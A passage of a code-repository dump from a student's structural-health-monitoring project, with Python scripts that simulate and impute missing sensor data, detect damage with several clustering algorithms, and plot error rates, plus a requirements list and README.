"text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\ndf_amputation = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results.csv')\ndf_imputation = pd.read_csv(\n '/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/results_Mean_Imputation.csv')\n\n# list_algorithms = ['K-Means', 'Fuzzy_C_Means', 'Affinity_Propagation', 'GMM', 'G_Means']\nlist_algorithms = ['K-Means', 'Fuzzy_C_Means', 'Affinity_Propagation', 'GMM', 'G_Means', 'DBSCAN_Center']\n# list_algorithms = ['K-Means']\n\nlist_colors = ['red', 'green', 'blue', '#f4c141', '#f442df', '#666564']\n\nfor i, algorithm_name in enumerate(list_algorithms):\n individual_results = df_imputation[df_imputation['algorithm'] == algorithm_name]\n individual_results_amputation = df_amputation[df_amputation['algorithm'] == algorithm_name]\n\n sensitivity = individual_results['true_positives'] / (\n individual_results['true_positives'] + individual_results['error_type_II'])\n specificity = individual_results['true_negatives'] / (\n individual_results['true_negatives'] + individual_results['error_type_I'])\n precision = individual_results['true_positives'] / (\n individual_results['true_positives'] + individual_results['error_type_I'])\n recall = sensitivity\n accuracy = (individual_results['true_positives'] + individual_results['true_negatives']) / (\n individual_results['true_positives'] + individual_results['true_negatives'] + individual_results['error_type_I'] +\n individual_results['error_type_II'])\n\n plt.plot(individual_results['missing_data_percentage'], precision, label=algorithm_name + \" (Imputação | Média)\",\n linestyle='dashed', color=list_colors[i])\n\n sensitivity_amputation = individual_results_amputation['true_positives'] / (\n individual_results_amputation['true_positives'] + individual_results_amputation['error_type_II'])\n specificity_amputation = individual_results_amputation['true_negatives'] / (\n individual_results_amputation['true_negatives'] + individual_results_amputation['error_type_I'])\n precision_amputation = individual_results_amputation['true_positives'] / (\n individual_results_amputation['true_positives'] + individual_results_amputation['error_type_I'])\n accuracy_amputation = (individual_results_amputation['true_positives'] + individual_results_amputation[\n 'true_negatives']) / (\n individual_results_amputation['true_positives'] + individual_results_amputation[\n 'true_negatives'] + individual_results_amputation['error_type_I'] +\n individual_results_amputation['error_type_II'])\n\n plt.plot(individual_results_amputation['missing_data_percentage'], precision_amputation,\n label=algorithm_name + \" (Amputação)\", color=list_colors[i])\n\n plt.ylabel(\"Precision\")\n plt.xlabel(\"Porcentagem de dados faltantes\")\n plt.legend(bbox_to_anchor=(0.1, 0.2), loc=2, borderaxespad=0.)\n\n plt.xticks([0, 5, 7, 10, 15])\n\n plt.show()\n"
},
{
"alpha_fraction": 0.6305263042449951,
"alphanum_fraction": 0.6368421316146851,
"avg_line_length": 35.57692337036133,
"blob_id": "e4897a7c6190c8372f58d2dc10dc8c5abdfc17d2",
"content_id": "94cf026452b3dc687a03dc33beb1a948734ea0fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 26,
"path": "/components/missing_data_simulator.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import random\nimport numpy as np\n\n\nclass MissingDataSimulator:\n \"\"\" The simulation of missing data is based on the assumption of MCAR (Missing Completely at Random) \"\"\"\n\n def __init__(self, original_data, missing_data_percentage):\n self.original_data = original_data\n self.missing_data_percentage = missing_data_percentage\n\n def simulate_missing_data(self):\n \"\"\"Replaces the samples chosen randomly to be removed with numpy.NaN and returns a new list\"\"\"\n num_samples_to_be_removed = round(len(self.original_data) * (self.missing_data_percentage / 100))\n\n new_database = list(self.original_data)\n\n for i in range(0, num_samples_to_be_removed):\n while True:\n rand_num = random.randint(0, len(new_database) - 1)\n\n if not np.isnan(new_database[rand_num]):\n new_database[rand_num] = np.NaN\n break\n\n return new_database"
},
{
"alpha_fraction": 0.4963977038860321,
"alphanum_fraction": 0.6938040256500244,
"avg_line_length": 15.523809432983398,
"blob_id": "3a68b9f7a8605bba5c6820f9b976821ef08fff92",
"content_id": "f84b04b04de7101de0b52c6fd4fdff06d606f182",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 84,
"path": "/requirements.txt",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "absl-py==0.2.2\nastor==0.6.2\nbleach==1.5.0\ncvxpy==1.0.6\ncycler==0.10.0\ndecorator==4.2.1\ndill==0.2.7.1\necos==2.0.5\nentrypoints==0.2.3\nfancyimpute==0.3.1\nfastcache==1.0.2\nfuture==0.16.0\ngast==0.2.0\ngrpcio==1.12.1\nh5py==2.8.0\nhtml5lib==0.9999999\nipykernel==4.8.0\nipython==6.2.1\nipython-genutils==0.2.0\nipywidgets==7.1.1\njedi==0.11.1\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.2\njupyter-console==5.2.0\njupyter-core==4.4.0\nKeras==2.2.0\nKeras-Applications==1.0.2\nKeras-Preprocessing==1.0.1\nknnimpute==0.1.0\nMarkdown==2.6.11\nMarkupSafe==1.0\nmatplotlib==2.1.2\nmistune==0.8.3\nmpmath==1.0.0\nmultiprocess==0.70.5\nnbconvert==5.3.1\nnbformat==4.4.0\nnetworkx==2.1\nnose==1.3.7\nnotebook==5.3.1\nnumpy==1.14.0\nosqp==0.3.1\npandas==0.22.0\npandocfilters==1.4.2\nparso==0.1.1\npexpect==4.3.1\npickleshare==0.7.4\npkg-resources==0.0.0\nply==3.10\nprompt-toolkit==1.0.15\nprotobuf==3.6.0\nptyprocess==0.5.2\nPygments==2.2.0\npyparsing==2.2.0\npython-dateutil==2.6.1\npytz==2017.3\nPyYAML==3.12\npyzmq==16.0.4\nqtconsole==4.3.1\nscikit-fuzzy==0.3.1\nscikit-learn==0.19.1\nscipy==1.0.0\nscs==2.0.2\nseaborn==0.8.1\nSend2Trash==1.4.2\nsimplegeneric==0.8.1\nsix==1.11.0\nsklearn==0.0\nsmop==0.0.0\nsympy==1.1.1\ntensorboard==1.8.0\ntensorflow==1.8.0\ntermcolor==1.1.0\nterminado==0.8.1\ntestpath==0.3.1\ntoolz==0.9.0\ntornado==4.5.3\ntraitlets==4.3.2\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.14.1\nwidgetsnbextension==3.1.3\n"
},
{
"alpha_fraction": 0.7099424600601196,
"alphanum_fraction": 0.7198027968406677,
"avg_line_length": 38.25806427001953,
"blob_id": "43e0484b0c9595645bea7d4218a4951a60bbc2e6",
"content_id": "b54ffe73556e680cefb3269a0bc4c934091779d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 31,
"path": "/results/results_analysis.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport pandas as pd\n\n# df = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results.csv')\ndf = pd.read_csv('/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/results_Mean_Imputation.csv')\n\nlist_algorithms = ['K-Means', 'Fuzzy_C_Means', 'DBSCAN_Center', 'Affinity_Propagation', 'GMM', 'G_Means']\n\nfor algorithm_name in list_algorithms:\n individual_results = df[df['algorithm'] == algorithm_name]\n\n print(individual_results)\n\n plt.plot(individual_results['missing_data_percentage'], individual_results['error_type_I'], label=\"Erros Tipo 1\")\n plt.plot(individual_results['missing_data_percentage'], individual_results['error_type_II'], label=\"Erros Tipo 2\")\n\n plt.title(algorithm_name)\n plt.ylabel(\"Número de erros\")\n plt.xlabel(\"Porcentagem de dados faltantes\")\n plt.legend(bbox_to_anchor=(0.8, 1.14), loc=2, borderaxespad=0.)\n\n locs, labels = plt.xticks()\n\n plt.xticks(individual_results['missing_data_percentage'])\n\n # plt.savefig('/home/alessandro/Documentos/Programming/Projects/TCC1/results/atualizados/{}.png'.format(algorithm_name))\n plt.show()\n\n plt.clf()\n plt.cla()\n plt.close()\n"
},
{
"alpha_fraction": 0.574986457824707,
"alphanum_fraction": 0.5861242413520813,
"avg_line_length": 32.151283264160156,
"blob_id": "d64e30ac61e0251cacfec7966bb49be5d58209db",
"content_id": "3e1e77fb3dba7aad480b9966e78fed3b308e0cbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12929,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 390,
"path": "/algoritmos_felipe/DamageDetection.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "from __future__ import division, print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.spatial.distance as distances\nimport skfuzzy as fuzz\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import KMeans, AffinityPropagation\nfrom sklearn.metrics import calinski_harabaz_score\nfrom sklearn.mixture import GaussianMixture\n\nfrom algoritmos_felipe.GMeans import GMeans\n\n\nclass DummySubplot:\n def plot(self, *args):\n pass\n\n def add_artist(self, *args):\n pass\n\n def axis(self, *args):\n pass\n\n\nclass DamageDetection:\n def __init__(self):\n self.DIs = None\n self._train_DIs = None\n self._data_break_point = None\n pass\n\n def train_and_test(self, training_data, test_data, break_point):\n pass\n\n def _set_resulting_parameters(self):\n # CALCULAR THRESHOLD\n lv = 0.95\n n = len(self.DIs)\n\n UCL = self._train_DIs[int(np.floor(len(self._train_DIs) * lv))]\n flag = np.zeros(n, dtype=bool)\n flag[self._data_break_point:] = 1\n\n # CALCULAR ACERTOS E ERROS TIPO I e II\n class_states = np.zeros(n)\n err_t1 = 0\n err_t2 = 0\n for i in range(n):\n if self.DIs[i] > UCL:\n if flag[i] == 0:\n class_states[i] = 3\n err_t1 += 1\n else:\n class_states[i] = 1\n elif flag[i] == 1:\n class_states[i] = 4\n err_t2 += 1\n else:\n class_states[i] = 2\n\n # CLASS STATE DIZ 1 = VERDADEIRO POSITIVO, 2=VERDADEIRO NEGATIVO, 3=FALSO POSITIVO, 4=FALSO NEGATIVO\n self.class_states = class_states\n self.UCL = UCL\n self.err = (err_t1, err_t2)\n\n\n# FUNCIONANDO_TESTE/LIMPO/\nclass K_Means(DamageDetection):\n def __init__(self, number_of_clusters=None):\n super().__init__()\n self.number_of_clusters = number_of_clusters\n\n @staticmethod\n def find_optimal_K(training_data, min_number_of_clusters, max_number_of_clusters):\n max_calinski_harabaz = {\n 'num_clusters': 0,\n 'score': -1\n }\n\n for i in range(min_number_of_clusters, max_number_of_clusters + 1):\n kmeans = KMeans(n_clusters=i, random_state=0).fit(training_data)\n\n score = calinski_harabaz_score(training_data, kmeans.labels_)\n\n if score >= max_calinski_harabaz['score']:\n max_calinski_harabaz['num_clusters'] = i\n max_calinski_harabaz['score'] = score\n\n return max_calinski_harabaz['num_clusters']\n\n def train_and_test(self, training_data, test_data, break_point):\n if not self.number_of_clusters:\n self.number_of_clusters = K_Means.find_optimal_K(training_data, min_number_of_clusters=2,\n max_number_of_clusters=11)\n\n # Aplica o KMEANS na base de dados de treino\n kmeans = KMeans(n_clusters=self.number_of_clusters, random_state=0).fit(training_data)\n\n # self.plot_clusters(kmeans, training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_dist = kmeans.transform(training_data)\n train_min_dist = np.zeros(len(training_data))\n for i in range(len(train_dist)):\n train_min_dist[i] = min(train_dist[i])\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n test_dist = kmeans.transform(test_data)\n test_min_dist = np.zeros(len(test_dist))\n for i in range(len(test_dist)):\n test_min_dist[i] = min(test_dist[i])\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n def plot_clusters(self, kmeans_model, train_data):\n labels = kmeans_model.labels_\n\n plt.scatter(range(0, len(train_data)), train_data[:, 0], c=labels, s=20, cmap='viridis')\n plt.show()\n\n# FUNCIONANDO_TESTE/LIMPO\nclass Fuzzy_C_Means(DamageDetection):\n def __init__(self, number_of_clusters=None):\n super().__init__()\n self.number_of_clusters = number_of_clusters\n\n @staticmethod\n def find_optimal_K(training_data, min_number_of_clusters, max_number_of_clusters):\n max_calinski_harabaz = {\n 'num_clusters': 0,\n 'score': -1\n }\n\n for i in range(min_number_of_clusters, max_number_of_clusters + 1):\n cntr, u, u0, d, jm, p, fpc = fuzz.cluster.cmeans(training_data.T, i, 5, error=0.005, maxiter=1000,\n init=None, seed=1)\n\n cluster_membership = np.argmax(u, axis=0)\n\n score = calinski_harabaz_score(training_data, cluster_membership)\n\n if score >= max_calinski_harabaz['score']:\n max_calinski_harabaz['num_clusters'] = i\n max_calinski_harabaz['score'] = score\n\n return max_calinski_harabaz['num_clusters']\n\n def train_and_test(self, training_data, test_data, break_point):\n if not self.number_of_clusters:\n self.number_of_clusters = Fuzzy_C_Means.find_optimal_K(training_data, 2, 11)\n\n cntr, u, _, d, _, _, fpc = fuzz.cluster.cmeans(\n training_data.T, self.number_of_clusters, 5, error=0.005, maxiter=1000, init=None, seed=1)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.min(d, axis=0)\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n _, _, d, _, _, _ = fuzz.cluster.cmeans_predict(\n test_data.T, cntr, 2, error=0.005, maxiter=1000)\n\n test_min_dist = np.min(d, axis=0)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass DBSCAN_Center(DamageDetection):\n def __init__(self, eps, min_points):\n super().__init__()\n self.eps = eps\n self.min_points = min_points\n\n def train_and_test(self, training_data, test_data, break_point):\n db = DBSCAN(self.eps, self.min_points).fit(training_data)\n\n # CALCULAR CENTROS\n\n labels = np.unique(db.labels_)\n\n max_label = max(labels)\n\n centers = np.zeros((max_label + 1, 2))\n\n # print(centers)\n\n for i in range(len(labels) - 1):\n if max_label == 0 and len(labels) == 1:\n indices = np.argwhere(db.labels_ == labels[i]).T[0]\n else:\n indices = np.argwhere(db.labels_ == labels[i + 1]).T[0]\n points = training_data[indices]\n x = [p[0] for p in points]\n y = [p[1] for p in points]\n centroid = (sum(x) / len(points), sum(y) / len(points))\n centers[i] = centroid\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n if db.labels_[i] == -1:\n train_min_dist[i] = -1\n continue\n train_min_dist[i] = distances.euclidean(point, centers[db.labels_[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n\n n = len(test_data)\n test_min_dist = np.zeros((n, max_label + 1))\n for i, point in enumerate(test_data):\n for j, center in enumerate(centers):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass Affinity_Propagation(DamageDetection):\n def __init__(self):\n super().__init__()\n\n def train_and_test(self, training_data, test_data, break_point):\n aff = AffinityPropagation().fit(training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n if aff.labels_[i] == -1:\n train_min_dist[i] = -1\n continue\n train_min_dist[i] = distances.euclidean(point, aff.cluster_centers_[aff.labels_[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n n = len(test_data)\n\n test_min_dist = np.zeros((n, len(aff.cluster_centers_)))\n for i, point in enumerate(test_data):\n for j, center in enumerate(aff.cluster_centers_):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\n# FUNCIONANDO_TESTE/LIMPO\nclass GMM(DamageDetection):\n def __init__(self, n_components=1):\n super().__init__()\n self.n_components = n_components\n\n def train_and_test(self, training_data, test_data, break_point):\n n_components = self.n_components\n\n gmm = GaussianMixture(n_components=n_components).fit(training_data)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n train_predicted = gmm.predict(training_data)\n for i, point in enumerate(training_data):\n train_min_dist[i] = distances.euclidean(point, gmm.means_[train_predicted[i]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n n = len(test_data)\n\n test_min_dist = np.zeros((n, n_components))\n for i, point in enumerate(test_data):\n for j, center in enumerate(gmm.means_):\n test_min_dist[i, j] = distances.euclidean(point, center)\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n\n self._set_resulting_parameters()\n\n\nclass G_Means(DamageDetection):\n def __init__(self):\n super().__init__()\n\n def train_and_test(self, training_data, test_data, break_point):\n gmeans = GMeans(strictness=4)\n gmeans.fit(training_data)\n\n # CALCULAR CENTROS\n labels = np.unique(gmeans.labels_)\n max_label = len(labels)\n centers = np.zeros((max_label + 1, training_data.shape[1]))\n a = {}\n for i, label in enumerate(labels):\n indices = np.argwhere(gmeans.labels_ == label).T[0]\n points = training_data[indices]\n a.update({label: i})\n for j in range(training_data.shape[1]):\n centers[i, j] = sum([p[j] for p in points]) / len(points)\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TREINO\n train_min_dist = np.zeros(len(training_data))\n for i, point in enumerate(training_data):\n train_min_dist[i] = distances.euclidean(point, centers[a[gmeans.labels_[i]]])\n\n train_min_dist = train_min_dist[train_min_dist >= 0]\n train_min_dist.sort()\n\n # ACHAR MENORES DISTANCIAS PARA OS DADOS DE TESTE\n\n n = len(test_data)\n test_min_dist = np.zeros((n, max_label + 1))\n for i, point in enumerate(test_data):\n for j, center in enumerate(centers):\n test_min_dist[i, j] = distances.euclidean(point, center)\n\n test_min_dist = np.min(test_min_dist, axis=1)\n\n self.DIs = test_min_dist\n self._train_DIs = train_min_dist\n self._data_break_point = break_point\n self._number_of_clusters = max_label\n self._set_resulting_parameters()\n\n\ndef method_name_1():\n current_file = 'C:/Users/Felipe/Documents/UFPA/TCC/manoel_afonso-matlab-0d7ca42aed75' \\\n '/sinal_aproximado_normalizado/original/Features_Orig_Hora_12_COL_2.csv'\n data = np.genfromtxt(current_file, delimiter=',')\n data = data[:, [0, 1]]\n return data\n\n\nif __name__ == \"__main__\":\n from numpy import genfromtxt\n\n all_data = method_name_1()\n\n print(all_data.shape)\n learn_data = all_data[1:158, :]\n\n alg = DBSCAN_Center(0.09, 3)\n alg.train_and_test(learn_data, all_data, 197)\n print(alg.err)\n\n # for i in range(158):\n # print(euclidean_distances(learn_data[0,:],learn_data[1,:]))\n\n\n '''alg.train_and_test(learn_data, all_data, 197)\n\n dis_1 = alg.DIs\n UCL_1 = alg.UCL\n print(alg.err)\n\n plt.plot(range(234), dis_1, 'o')\n plt.axhline(y=UCL_1, color='k', linestyle='-')\n\n plt.axis('tight')\n\n plt.show()'''\n"
},
{
"alpha_fraction": 0.7876712083816528,
"alphanum_fraction": 0.7876712083816528,
"avg_line_length": 47.66666793823242,
"blob_id": "8f2c29fd40c6d2d74009258c93706b90fa8980ea",
"content_id": "549787691d31de9b74ee2d4ee23ff249346add26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "# Framework SHM UFPA\n\nRepositório utilizado para os códigos do meu trabalho de conclusão de curso (TCC) com orientação do professor Claudomiro Sales (UFPA)\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.654566764831543,
"avg_line_length": 28.79069709777832,
"blob_id": "93f76fe7fd4cff74cfa6111d613fbcc0a91b2045",
"content_id": "ab3230fde98ba7668477773328b6e0a22d394f78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2582,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 86,
"path": "/algorithms/feature_extraction/feature_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport scipy.io\n\nfrom algorithms.feature_extraction.step_extraction import step_extraction\n\n\ndef simulate_missing_data(data, missing_data_percentage):\n num_samples_to_be_removed = round(len(data) * (missing_data_percentage / 100))\n\n new_database = list(data)\n\n for i in range(0, num_samples_to_be_removed):\n while True:\n rand_num = random.randint(0, len(new_database) - 1)\n\n if not np.isnan(new_database[rand_num]):\n new_database[rand_num] = np.NaN\n break\n\n return new_database\n\n\ndef realizar_amputacao_dados(data):\n return [x for x in data if not np.isnan(x)]\n\n\ndef normalize_var(array, x, y):\n \"\"\"\n Normaliza os valores de um array no intervalo [x,y].\n\n :param array: Valores originais.\n :param x: Intervalo para a normalização (ex.: [0,1]).\n :param y: Intervalo para a normalização (ex.: [0,1]).\n :return: Valores normalizados\n \"\"\"\n\n m = min(array)\n\n range = max(array) - m\n\n array = (array - m) / range\n\n range2 = y - x\n normalized = (array * range2) + x\n\n return normalized\n\n\ndef extract_features(dataset_path, missing_data_percentage=0, imputation_strategy=None):\n \"\"\"\n %% Stand-alone Feature Extraction\n % Extrai as features do sinal original e aproximado. Sendo que o sinal\n % aproximado já está disponível em algum diretório. As features serão\n % salvas sobrescrevendo os arquivos já existentes para cada limiar de cada\n % algoritmo. Este script é útil caso se deseje alterar o cálculo das\n % features, bem como incluir outras.\n \"\"\"\n\n # Qual sensor usaremos para comprimir (há 8 sensores no total).\n # COLUNA 1 2 3 4 5 6 7 8\n # SENSOR 3 5 6 7 10 12 14 16\n canal = 1\n\n temp = scipy.io.loadmat(dataset_path)\n\n # Obtém apenas a matriz desta observação com os 8 canais.\n dataset_orig = temp['data']\n\n # Obtém as leituras do canal de interesse.\n dataset_orig = dataset_orig[:, canal]\n\n # Normalização. (Let's hope this won't break the script).\n dataset_orig = normalize_var(dataset_orig, -1, 1)\n\n dataset_missing_data = simulate_missing_data(dataset_orig, missing_data_percentage)\n\n if imputation_strategy:\n dataset_orig = imputation_strategy.impute_data(dataset_missing_data)\n else:\n dataset_orig = realizar_amputacao_dados(dataset_missing_data)\n\n # Extrai as features do sinal original.\n feat_vector_orig = step_extraction(dataset_orig, 1)\n\n return feat_vector_orig\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6553288102149963,
"avg_line_length": 43.099998474121094,
"blob_id": "24a95fd79be93c3baec72162e39d0d775fca7ae7",
"content_id": "c54c4f58531f4be8962a3ce94f88ce314ecfb80f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 30,
"path": "/results/plot_frequencies.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef get_extracted_data(missing_data_percentage, iteration_number, imputation_method=None):\n if imputation_method:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(imputation_method.description,\n missing_data_percentage, iteration_number)\n else:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(missing_data_percentage, iteration_number)\n\n data = np.genfromtxt(filename, delimiter=',')\n\n # Pegando apenas as frequências\n data = data[:, [0, 1]]\n return data\n\n\nfull_data_0_percent = get_extracted_data(missing_data_percentage=0, iteration_number=0)\nfull_data_5_percent = get_extracted_data(missing_data_percentage=10, iteration_number=0)\n\nplt.xlabel('f1')\nplt.ylabel('f2')\nplt.scatter(full_data_0_percent[:, 0], full_data_0_percent[:, 1], s=20, cmap='viridis', label=\"{}%\".format(0))\nplt.scatter(full_data_5_percent[:, 0], full_data_5_percent[:, 1], s=20, cmap='viridis', label=\"{}%\".format(10))\n\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.6491228342056274,
"alphanum_fraction": 0.6491228342056274,
"avg_line_length": 27.5,
"blob_id": "db6f3ee63f61caac0e6667af70b91c898b98fc1d",
"content_id": "eb0ea94d172c0294f0b269fdc7c62a239c1a03ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 10,
"path": "/components/missing_data_amputator.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass MissingDataAmputator:\n def __init__(self, data):\n self.data = data\n\n def amputate_data(self):\n \"\"\"Removes all samples that have numpy.NaN as theirs values and returns a new list\"\"\"\n return [x for x in self.data if not np.isnan(x)]\n"
},
{
"alpha_fraction": 0.5866666436195374,
"alphanum_fraction": 0.5911111235618591,
"avg_line_length": 20.634614944458008,
"blob_id": "66555572fc1165d863e249b0b590487b00e340aa",
"content_id": "6061fa53df0b01aca8a84dff8064167a6f0c0f7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 52,
"path": "/algorithms/data_imputation/DataImputation.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom fancyimpute import KNN\n\n\nclass MeanImputation:\n description = 'Mean_Imputation'\n\n @staticmethod\n def impute_data(data):\n df = pd.DataFrame(data)\n\n df = df.fillna(np.nanmean(data))\n\n return df[0].values.tolist()\n\n\nclass InterpolationImputation:\n description = 'Interpolation_Imputation'\n\n @staticmethod\n def impute_data(data):\n s = pd.Series(data)\n\n return s.interpolate().tolist()\n\n\nclass KNNImputation:\n description = 'KNN_Imputation'\n\n @staticmethod\n def impute_data(data, original_data):\n matrix = [data]\n\n for i in range(0, 250):\n matrix.append(original_data)\n\n full_data = KNN().complete(matrix)\n\n print(full_data)\n return full_data\n\n\n # class MICEImputation:\n # description = 'MICE_Imputation'\n #\n # @staticmethod\n # def impute_data(data):\n # full_data = IterativeSVD(gradual_rank_increase=False).complete(np.matrix([data]))\n #\n # print(full_data)\n # return full_data\n"
},
{
"alpha_fraction": 0.6364942789077759,
"alphanum_fraction": 0.6408045887947083,
"avg_line_length": 20.75,
"blob_id": "7355031dcdad635f93b84daab3eed5989ff7b6ca",
"content_id": "8cf998460699864e0db0d567f9f824dc7d99e9f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 64,
"path": "/components/data_imputation/DataImputation.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom fancyimpute import KNN\n\n\nclass MeanImputation:\n description = 'Mean_Imputation'\n descricao = \"Média\"\n\n @staticmethod\n def impute_data(data):\n df = pd.DataFrame(data)\n\n df = df.fillna(np.nanmean(data))\n\n return df[0].values.tolist()\n\n\nclass InterpolationImputation:\n description = 'Interpolation_Imputation'\n descricao = 'Interpolação'\n\n @staticmethod\n def impute_data(data):\n s = pd.Series(data)\n\n # interpolation_result = s.interpolate().dropna().tolist()\n interpolation_result = s.interpolate(limit_direction='both').tolist()\n\n return interpolation_result\n\n\nclass KNNImputation:\n description = 'KNN_Imputation_N_3'\n descricao = 'KNN'\n\n @staticmethod\n def impute_data(data):\n print('# imputing data KNN')\n full_data = KNN(k=3).complete(data)\n\n return full_data\n\n\nclass KNNImputation_7:\n description = 'KNN_Imputation_N_7'\n\n @staticmethod\n def impute_data(data):\n print('# imputing data KNN')\n full_data = KNN(k=7).complete(data)\n\n return full_data\n\n\n# class MICEImputation:\n# description = 'MICE_Imputation'\n#\n# @staticmethod\n# def impute_data(data):\n# full_data = IterativeSVD(gradual_rank_increase=False).complete(np.matrix([data]))\n#\n# print(full_data)\n# return full_data\n"
}
] | 16 |
flyflo86/Clone
|
https://github.com/flyflo86/Clone
|
fcad05f67c249c73d7c570381b301fef03d51970
|
3972411f58f3f40c28f2df3a64367327b9b327a7
|
f344d910752c2943677a634e32a234d5d596df65
|
refs/heads/master
| 2021-01-01T17:58:32.822791 | 2017-08-07T15:02:59 | 2017-08-07T15:02:59 | 98,207,440 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5901308059692383,
"alphanum_fraction": 0.6062958836555481,
"avg_line_length": 38.00425720214844,
"blob_id": "0ad4b91ff176162f107279b300ba79b80b691818",
"content_id": "8eb8917d5bc8cb0cb7ec40fd9ea37e163ab285c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9403,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 235,
"path": "/model.py",
